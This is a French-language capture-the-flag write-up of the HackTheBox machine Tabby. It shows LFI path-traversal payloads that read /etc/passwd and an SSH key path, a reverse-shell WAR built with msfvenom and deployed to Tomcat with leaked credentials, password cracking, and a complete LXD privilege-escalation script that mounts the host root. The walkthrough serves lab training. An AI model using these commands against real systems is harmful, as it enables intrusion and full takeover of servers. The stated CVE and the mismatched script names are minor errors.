Tabby HackTheBox (Writeup)

Skills:

Local File Inclusion (LFI)
Abusing Tomcat Virtual Host Manager
Abusing Tomcat Text-Based Manager - Deploy Malicious War (Curl Method)
LXD Exploitation (Privilege Escalation)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.194 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard.

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,8080 10.10.10.194 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Port 80:

Recherche de répertoires :

Nous utilisons Gobuster pour rechercher des répertoires sur le site:

gobuster dir -u http://megahosting.htb -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Résultats : assets, files, et server-status.

Recherche sous-domaines:

gobuster vhost -u http://megahosting.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 | grep -v "400"

Vulnérabilité LFI:

Accédez au fichier vulnérable new.php via une variable ?file dans le dossier statement.

Test de l’inclusion de fichier local (LFI) :

http://megahosting.htb/news.php?file=../../../../etc/passwd

Résultat : Accès au fichier /etc/passwd, révélant deux utilisateurs : ash et root.

Tentative d'accès à la clé SSH privée d’Ash :

?file=../../../../../../../home/ash/.ssh/id_rsa

Résultat : Accès refusé.

Recherche de ports internes via le fichier /proc/net/tcp pour identifier les services cachés :

Recherche de ports internes via le fichier /proc/net/tcp pour identifier les services cachés :

curl -s -X GET "http://megahosting.htb/news.php?file=../../../../../../../proc/net/tcp" |
awk 'NR>1 { 
    # Toma el campo local_address
    split($2, addr_port, ":");
    
    # Convierte la dirección a formato IP
    hex_addr = addr_port[1];
    ip = sprintf("%d.%d.%d.%d", 
                 strtonum("0x" substr(hex_addr, 7, 2)), 
                 strtonum("0x" substr(hex_addr, 5, 2)), 
                 strtonum("0x" substr(hex_addr, 3, 2)), 
                 strtonum("0x" substr(hex_addr, 1, 2)));

    # Convierte el puerto a decimal
    port = strtonum("0x" addr_port[2]);
    
    # Imprime el resultado en formato IP:Puerto
    printf "%s:%d\n", ip, port;
}'

Résultat : Découverte du port interne 34650

Exploitation du Virtual Host Manager de Tomcat (Port 8080)

Accès à Tomcat via le port 8080 et recherche des informations d’authentification. Par défaut, celles-ci sont stockées dans /etc/tomcat9/tomcat-users.xml ou usr/share/tomcat9/etc/tomcat-users.xml

Credentials trouvés :

username = tomcat

password = $3cureP4s5w0rd123!

Tentative d'accès à /manager/html renvoyant une erreur 403.

Alternative via /host-manager/html, mais incapacité de créer une application avec un fichier .war.

Tomcat exploit variant : host-manager - CertilienceCertilience

Exploitation du Text-Based Manager de Tomcat

Lister les applications en ligne de commande :

curl -u 'tomcat:$3cureP4s5w0rd123!' -s -X GET "http://megahosting.htb:8080/manager/text/list"

Création d'un fichier WAR pour Reverse Shell avec msfvenom :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=443 -f war -o reverse.war

Déploiement du fichier WAR via Curl :

curl -s -u 'tomcat:$3cureP4s5w0rd123!' "http://megahosting.htb:8080/manager/text/deploy?path=/reverse" --upload-file reverse.war

Écoute pour la connexion reverse shell

nc -nlvp 443

Accès au reverse shell via l’URL http://megahosting.htb:8080/reverse.

Traitement du Terminal

Une fois que vous avez accès au serveur Linux, voici les commandes à effectuer pour le traitement en terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Cela permettra de travailler de manière beaucoup plus efficace et surtout plus confortable.

Élévation de privilège:

Exploration du dossier /var/www/html En examinant le contenu de ce dossier, nous découvrons un dossier files contenant un fichier de sauvegarde : 16162020_backup.zip.

Transfert du fichier .zip vers la machine locale

Pour faciliter l'analyse, nous transférons le fichier compressé vers notre machine locale en démarrant un serveur HTTP avec Python :

python3 -m http.server 655

Brute Force .zip File:

Décompression du fichier .zip - Bruteforce du mot de passe Le fichier .zip est protégé par un mot de passe.

Extraction du hash avec zip2john :

Nous allons donc utiliser zip2john pour extraire le hash

zip2john 16162020_backup.zip > hash

Cracking du mot de passe avec john :

john -w:/usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt hash

Résultat : Mot de passe trouvé - admin@it.

Décompression et analyse du contenu Utilisez le mot de passe pour décompresser l'archive :

La décompression crée un dossier var contenant peu de fichiers utiles. Cependant, le mot de passe admin@it fonctionne également pour l’utilisateur ash sur la machine cible.

Flag User.txt

LXD Exploitation:

Identification de l'appartenance de l'utilisateur ash au groupe lxd :

En vérifiant les groupes auxquels l'utilisateur ash appartient, on remarque qu'il fait partie du groupe lxd, ce qui permet d'exploiter LXC pour obtenir des privilèges root.

Téléchargement et préparation de l'exploit :

Utilisez searchsploit pour obtenir le script d'exploitation correspondant à la vulnérabilité LXC (CVE-2020-16941)

Ce script permet d'exploiter la vulnérabilité LXC pour exécuter des commandes avec des privilèges élevés.

Contenu du script d'exploitation (46978.sh) :

#!/usr/bin/env bash

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi

Le script permet de créer un conteneur LXC avec des privilèges élevés, ce qui nous permet d'obtenir un accès root sur la machine cible.

Téléchargement du fichier d'image Alpine et du script:

Clonez le repository contenant les fichiers nécessaires à l'exploitation et transférez-les à votre machine via un serveur HTTP local.

git clone https://github.com/saghul/lxd-alpine-builder

Démarrez un serveur HTTP local pour servir le fichier et le script

python3 -m http.server 80

Sur votre machine cible, téléchargez le script et le fichier d'image :

cd /tmp
wget http://10.10.14.7/46978.sh
wget http://10.10.14.7/alpine-v3.13-x86_64-20210218_0139.tar.gz

Mise à jour du PATH :

Adaptez le PATH pour s'assurer que les commandes LXC sont correctement interprétées.

export PATH=/home/jordan/.local/bin:/snap/bin:/usr/sandbox:/opt/nvim-linux64/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/share/games:/usr/local/sbin:/usr/sbin:/sbin:/opt/kitty/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/home/jordan/.fzf/bin:/usr/local/bin

Exécution du script d'exploitation

Exécutez le script avec le fichier d'image Alpine téléchargé pour exploiter la vulnérabilité et obtenir un shell root :

./lxd.sh -f alpine-v3.13-x86_64-20210218_0139.tar.gz

Pour sortir du conteneur, il suffit de se rendre dans le répertoire /mnt/root.

Flag root :)

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?